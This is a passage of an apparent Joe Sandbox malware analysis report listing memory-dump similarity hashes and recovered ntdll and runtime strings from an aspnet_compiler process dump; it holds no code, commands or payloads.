                                                                                                        • Opcode ID: 6858df91d61c516688a0c7b116ed58c49edce2e8baf3291b7917b9aa737ca98a
                                                                                                        • Instruction ID: a5a2e1f6880cb7a99318d8c739d745d448771f07a797a6835b63ad42e02aea71
                                                                                                        • Opcode Fuzzy Hash: 6858df91d61c516688a0c7b116ed58c49edce2e8baf3291b7917b9aa737ca98a
                                                                                                        • Instruction Fuzzy Hash: 6F90047531150003010DF55C070450F004FD7D5351355C031F5017550CD733CD715331
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d7633bf9301f048a90a7779e7f400ab7ca77642f26cc0e1d0db43e557e3c2e17
                                                                                                        • Instruction ID: 1e8a94a22e36161a4bd0006ba0c4872cecf9edb1b1a5153ecbd08690fd0d3373
                                                                                                        • Opcode Fuzzy Hash: d7633bf9301f048a90a7779e7f400ab7ca77642f26cc0e1d0db43e557e3c2e17
                                                                                                        • Instruction Fuzzy Hash: 38900265221500020149B558070450F0449A7D6351395C015F5417590CC72289755321
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8e6687b8c0a8c69f9c1415c401d40f9dbc1a8b186d9c7c2a68eeba5fb52a5fd5
                                                                                                        • Instruction ID: 55f33203e88252cb18534c3618ee2b1f7d834b744ad5161ff3206b0dedb7521e
                                                                                                        • Opcode Fuzzy Hash: 8e6687b8c0a8c69f9c1415c401d40f9dbc1a8b186d9c7c2a68eeba5fb52a5fd5
                                                                                                        • Instruction Fuzzy Hash: 3290026921350002D1847158550860E000997D1202F95D415A4016558CCA1689795321
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: afe16934de6018057b1d5372fc211acbd1128b9bbf4c2ff362b436db503e29a3
                                                                                                        • Instruction ID: a190ea88a47aa0f0d61ed2ffcf02f67bd27ffa5a4799b0d9b4ae175dd97ccf3a
                                                                                                        • Opcode Fuzzy Hash: afe16934de6018057b1d5372fc211acbd1128b9bbf4c2ff362b436db503e29a3
                                                                                                        • Instruction Fuzzy Hash: 1C90027120250142954472585904A4E410997E1302B95D415A4016554CCA1589715321
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8eaa36c275afd554952a1f3906bb25aaebd88f5034522a820b47b1b29cc5e645
                                                                                                        • Instruction ID: a261f2c7ae6a712e24c0037132a7510654cdec105907a0ea3273f48109e7ffb7
                                                                                                        • Opcode Fuzzy Hash: 8eaa36c275afd554952a1f3906bb25aaebd88f5034522a820b47b1b29cc5e645
                                                                                                        • Instruction Fuzzy Hash: 0490026120554442D10475585508A0A000997D0205F55D011A5065595DC7368961A231
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a0df8ae1879e38db33b5365ca3c908cf9462e7476186abfa2f7e00460a334f6d
                                                                                                        • Instruction ID: c51a72dec1685634668a4afe3404048e02342b9164dea6ae2b79268c45947e7b
                                                                                                        • Opcode Fuzzy Hash: a0df8ae1879e38db33b5365ca3c908cf9462e7476186abfa2f7e00460a334f6d
                                                                                                        • Instruction Fuzzy Hash: C090026130150003D1447158551860A4009E7E1301F55D011E4415554CDA1689665322
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 20a04954b0b1b8cef82c0cca22ee14ee811ddb64d44889c1d1549816bbb13303
                                                                                                        • Instruction ID: 5c8979d2ccb5a69ee405c57e4e1c0949f6deb4fd2743c0a02cc32f36964a4eae
                                                                                                        • Opcode Fuzzy Hash: 20a04954b0b1b8cef82c0cca22ee14ee811ddb64d44889c1d1549816bbb13303
                                                                                                        • Instruction Fuzzy Hash: A890027520150402D5147158590464A004A97D0301F55D411A4425558DC75589B1A221
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b2a3718b984372f8a00657a9b1850c21f6897ff8800a774e6d093564ce7b0d1e
                                                                                                        • Instruction ID: 9c8f45b9c5fdd767f5ebd7787c1eb883ecbb2e740875b6fb433013d8ff554e89
                                                                                                        • Opcode Fuzzy Hash: b2a3718b984372f8a00657a9b1850c21f6897ff8800a774e6d093564ce7b0d1e
                                                                                                        • Instruction Fuzzy Hash: B390027124150402D1457158450460A000DA7D0241F95C012A4425554EC7568B66AB61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a90ae5bb05dc291c80542ea03cab8a1c4784f5411016f42839f62adb4c8db6d6
                                                                                                        • Instruction ID: f8ed9c147fa4fecb6f1451288f05775c686514a03478a1afdf2741ebb7d02498
                                                                                                        • Opcode Fuzzy Hash: a90ae5bb05dc291c80542ea03cab8a1c4784f5411016f42839f62adb4c8db6d6
                                                                                                        • Instruction Fuzzy Hash: 3A900261242541525549B158450450B400AA7E0241795C012A5415950CC6279966D721
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 54f9803b5c4883cc6560916d5fc663335987c8e8b1847d1d2ad96e34c04308c2
                                                                                                        • Instruction ID: 3f74932a65e2ee9529af7ea4c5a7044e1f64862cf8c5f7134f59d3d17ba7c33d
                                                                                                        • Opcode Fuzzy Hash: 54f9803b5c4883cc6560916d5fc663335987c8e8b1847d1d2ad96e34c04308c2
                                                                                                        • Instruction Fuzzy Hash: 9D90027120150842D10471584504B4A000997E0301F55C016A4125654DC716C9617621
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cee46d3f416f44c4c796e4b1611492a6e67be882ae8a7dcaaa5139e5ea369dad
                                                                                                        • Instruction ID: cfa12ccd12667aa9d31d85e131434d7e98c4901369631afdf787a61bb4fb1cf8
                                                                                                        • Opcode Fuzzy Hash: cee46d3f416f44c4c796e4b1611492a6e67be882ae8a7dcaaa5139e5ea369dad
                                                                                                        • Instruction Fuzzy Hash: 2290027120150402D1047598550864A000997E0301F55D011A9025555EC76689A16231
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 160f37890667e068e0c39ad21699f25a996d3e2521f515c0ee823e726949f63f
                                                                                                        • Instruction ID: 344aa7afc7b922d380821b86613c8b5d2861bbb38dee383c6a17561300ffad0f
                                                                                                        • Opcode Fuzzy Hash: 160f37890667e068e0c39ad21699f25a996d3e2521f515c0ee823e726949f63f
                                                                                                        • Instruction Fuzzy Hash: 0590026160550402D1447158551870A001997D0201F55D011A4025554DC75A8B6567A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e5eb81978b5634413dd70bfb74c9c031066bcf553c76dd190ace2be68d68cb01
                                                                                                        • Instruction ID: db009562afec959222618a8bd3a8e12347ea21777faeb5e6d6c6c6d070b91584
                                                                                                        • Opcode Fuzzy Hash: e5eb81978b5634413dd70bfb74c9c031066bcf553c76dd190ace2be68d68cb01
                                                                                                        • Instruction Fuzzy Hash: 3A90027120150403D1047158560870B000997D0201F55D411A4425558DD75789616221
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3de7ee01ccd077faf19a7353b3ace0ba5ede3b8b36819bae5428a9e66716f312
                                                                                                        • Instruction ID: f615ebd6f2ff3c1fdfdfb120cc8fa3859ca5913ba11b0e63252a5cf5818397f9
                                                                                                        • Opcode Fuzzy Hash: 3de7ee01ccd077faf19a7353b3ace0ba5ede3b8b36819bae5428a9e66716f312
                                                                                                        • Instruction Fuzzy Hash: 059002A134150442D10471584514B0A0009D7E1301F55C015E5065554DC71ACD626226
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 08c703cc9db10e0c66c42755a61386bcdbcbf0bd63819440a754fcb2980f4252
                                                                                                        • Instruction ID: 26e5984b386a0356f9a177d928581a71e4014eb1b8bab8d3a8861994c95c9c49
                                                                                                        • Opcode Fuzzy Hash: 08c703cc9db10e0c66c42755a61386bcdbcbf0bd63819440a754fcb2980f4252
                                                                                                        • Instruction Fuzzy Hash: 6B9002A121150042D1087158450470A004997E1201F55C012A6155554CC62A8D715225
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0af298cc95694654d8374b0b172c9b638cb234f8ea71e74a8dd56b4c46a982f8
                                                                                                        • Instruction ID: e3a75406ecbab3ca2e26b0ac9915f90765299e25479bd7a225e2b10b38a45091
                                                                                                        • Opcode Fuzzy Hash: 0af298cc95694654d8374b0b172c9b638cb234f8ea71e74a8dd56b4c46a982f8
                                                                                                        • Instruction Fuzzy Hash: 6090027120190402D1047158491470F000997D0302F55C011A5165555DC72689616671
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b8348279455109b35a15913706fea4387eefd392d3a773fa9426a33d9dfdd49d
                                                                                                        • Instruction ID: b695e5d59af49ddf67d13b72c2ef37ef66a241ed499c68a76f87bc665412f781
                                                                                                        • Opcode Fuzzy Hash: b8348279455109b35a15913706fea4387eefd392d3a773fa9426a33d9dfdd49d
                                                                                                        • Instruction Fuzzy Hash: 669002616015004241447168894490A4009BBE1211755C121A4999550DC65A89755765
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bb4e9617af7c348a6065e91f8a2f344c473e4f23e899f8318caf066d7772b911
                                                                                                        • Instruction ID: 5e1ba4814d8444c382812b09c993e5e3809879a3c93a9396e1aefafeb9785f38
                                                                                                        • Opcode Fuzzy Hash: bb4e9617af7c348a6065e91f8a2f344c473e4f23e899f8318caf066d7772b911
                                                                                                        • Instruction Fuzzy Hash: 1790027120190402D1047158490874B000997D0302F55C011A9165555EC766C9A16631
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4a2b7e7802fafd8169a0c7b043116208ee6b25ac20ff7e75f28c6c2b58a3e32e
                                                                                                        • Instruction ID: 76c7bf8267f5751c9158e95c39cc52af74195ff0cf910393158d638744037508
                                                                                                        • Opcode Fuzzy Hash: 4a2b7e7802fafd8169a0c7b043116208ee6b25ac20ff7e75f28c6c2b58a3e32e
                                                                                                        • Instruction Fuzzy Hash: 00900261211D0042D20475684D14B0B000997D0303F55C115A4155554CCA1689715621
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6937673d12d2f8895191f2b75b5bf359537408c22b0895bb04dc86b0dc751074
                                                                                                        • Instruction ID: e4ca0c6698d7e2af4440caf9828863a43c2bbc06c2ce16bf8c88c6732e50d678
                                                                                                        • Opcode Fuzzy Hash: 6937673d12d2f8895191f2b75b5bf359537408c22b0895bb04dc86b0dc751074
                                                                                                        • Instruction Fuzzy Hash: 1390026130150402D1067158451460A000DD7D1345F95C012E5425555DC7268A63A232
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d5d3eafca447cdc20c69916fe634dc9ae8907a7e1070f57bb45703a841e950ca
                                                                                                        • Instruction ID: 1ab9a44952bef23aebeb2198e35de534d2cf9f24113d64324be2e24ddd28a089
                                                                                                        • Opcode Fuzzy Hash: d5d3eafca447cdc20c69916fe634dc9ae8907a7e1070f57bb45703a841e950ca
                                                                                                        • Instruction Fuzzy Hash: 7990026160150502D1057158450461A000E97D0241F95C022A5025555ECB268AA2A231
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bd6caa0c0339d5d5a4d8637d91a9180441ae7c16edd6a6b06a878ac24506d242
                                                                                                        • Instruction ID: 3f8d84effba803332ae3bd6afadc6c20551e6a172143f78b0cb7392eb6d298a5
                                                                                                        • Opcode Fuzzy Hash: bd6caa0c0339d5d5a4d8637d91a9180441ae7c16edd6a6b06a878ac24506d242
                                                                                                        • Instruction Fuzzy Hash: 7C9002B120150402D1447158450474A000997D0301F55C011A9065554EC75A8EE56765
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e92b1734487212cc7da59e8d91d00a6dd33504a9dd20eccd18961ae7d0deb56
                                                                                                        • Instruction ID: a807827ea5700e584326d54a04eda36bf403520c9b8fbd706541630efac30b98
                                                                                                        • Opcode Fuzzy Hash: 5e92b1734487212cc7da59e8d91d00a6dd33504a9dd20eccd18961ae7d0deb56
                                                                                                        • Instruction Fuzzy Hash: AD9002A120190403D1447558490460B000997D0302F55C011A6065555ECB2A8D616235
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction ID: 77062b74d4dc7a489741dfeced9d617147566824fc21923995049fbefe02ff05
                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 28bab979eb9546fbb667d578e0686619cd40fe57a58f0fbb81bb939fdcbf73ea
                                                                                                        • Instruction ID: 7094e6baaaf31043c16ae7ba20fbf51b85c229c53f20d3cb6c6668e157cea3ee
                                                                                                        • Opcode Fuzzy Hash: 28bab979eb9546fbb667d578e0686619cd40fe57a58f0fbb81bb939fdcbf73ea
                                                                                                        • Instruction Fuzzy Hash: C751E6B6A04116EFCB59DB9C899097EFBF8BB08244714C12AF8B5D7641E374DE508BA0
                                                                                                        Strings
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011846FC
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01184725
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01184787
                                                                                                        • ExecuteOptions, xrefs: 011846A0
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01184655
                                                                                                        • Execute=1, xrefs: 01184713
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01184742
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 3260575790b8be8008eb001af478af58d49b1bde5f671be675b218a0d55ca96c
                                                                                                        • Instruction ID: 015e8402014db4257767a5bfd377175e3b3212813b58c56944d56ea466bf8a96
                                                                                                        • Opcode Fuzzy Hash: 3260575790b8be8008eb001af478af58d49b1bde5f671be675b218a0d55ca96c
                                                                                                        • Instruction Fuzzy Hash: 0A514B31A0021ABBFF2DEBA9EC99FAD77B9EF14704F040099D605AB1C1DB709A418F51
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: 8fdf0b5202b7dda7da6ae8ee1bbbe6158207376da38c583602b52ac17e136510
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: 7F819E70E09649DEEFAD8E6CC8917FEBBA3AF45320F184159DC71A72D1C73498408B69
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01187B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 01187BAC
                                                                                                        • RTL: Resource at %p, xrefs: 01187B8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: 34ae2bb837065a887f37c6a28844a41db662a7c75adf4bc58e3678677660c5ae
                                                                                                        • Instruction ID: 68e5fb449c3bc961312b56841d0ec6fd75d7e9aefbebd4f46276dabea795b57f
                                                                                                        • Opcode Fuzzy Hash: 34ae2bb837065a887f37c6a28844a41db662a7c75adf4bc58e3678677660c5ae
                                                                                                        • Instruction Fuzzy Hash: 8541F6353057029FD728DE29C840B6AB7E5EF94B10F100A1DFA9ADB680D731E8058F96
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0118728C
                                                                                                        Strings
                                                                                                        • RTL: Re-Waiting, xrefs: 011872C1
                                                                                                        • RTL: Resource at %p, xrefs: 011872A3
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01187294
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: e15adce722aab2f41a3620d3e78b46bf631daeb74b49faa1578331635f178827
                                                                                                        • Instruction ID: cff1f52c6011afc80762ef8819b491133c156157223ccc58ffa8a015fa7c860e
                                                                                                        • Opcode Fuzzy Hash: e15adce722aab2f41a3620d3e78b46bf631daeb74b49faa1578331635f178827
                                                                                                        • Instruction Fuzzy Hash: 9E413531704202ABC718DE29CC41B66BBA5FF54714F244619F995DB680DB30E842CBD1
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 5a64cdd0b6003b9d240749848ae3f0afd7f73d0bfb603de1de26c569fad14b6c
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: 6E91B271E00216DFEBACDF6DC8826BEBBA5EF44320F94451AED75A72C0D73089418752
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: 5fc0abd0608e23522fc89673ac5852d7c157e6d5a41e47f0f2d69d6aba86f15c
                                                                                                        • Instruction ID: 011b887749d82ecaba7eb643440b52c1dbb8140952e8294141f708ddcbaa0e49
                                                                                                        • Opcode Fuzzy Hash: 5fc0abd0608e23522fc89673ac5852d7c157e6d5a41e47f0f2d69d6aba86f15c
                                                                                                        • Instruction Fuzzy Hash: 66811C71D002699BDB39DB54CC44BEEBBB8AF48754F0041EAEA19B7280D7705E85CFA1
                                                                                                        APIs
                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0119CFBD
                                                                                                        Strings
